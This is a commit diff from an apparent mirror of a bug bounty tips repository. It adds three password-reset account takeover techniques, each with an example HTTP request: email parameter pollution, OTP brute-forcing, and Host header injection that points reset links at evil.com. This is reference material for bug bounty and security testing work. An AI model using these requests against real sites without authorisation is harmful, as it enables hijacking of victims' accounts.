mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-19 19:06:13 +00:00
Account Takover [1]
Create account takeover tips, and add 3 tips
This commit is contained in:
parent
1222314a08
commit
4e7af26eb2
24
AccountTakeover.md
Normal file
24
AccountTakeover.md
Normal file
@ -0,0 +1,24 @@
|
|||||||
|
## Account Takeover
|
||||||
|
|
||||||
|
1. Parameter pollution in reset password
|
||||||
|
```
|
||||||
|
POST /reset
|
||||||
|
[...]
|
||||||
|
email=victim@mail.com&email=hacker@mail.com
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Bruteforce the OTP code
|
||||||
|
```
|
||||||
|
POST /reset
|
||||||
|
[...]
|
||||||
|
email=victim@mail.com&code=$123456$
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Host header Injection
|
||||||
|
```
|
||||||
|
POST /reset
|
||||||
|
Host: evil.com
|
||||||
|
[...]
|
||||||
|
email=victim@mail.com
|
||||||
|
```
|
||||||
|
And the victim will receive the reset link with your evil.com
|
Loading…
Reference in New Issue
Block a user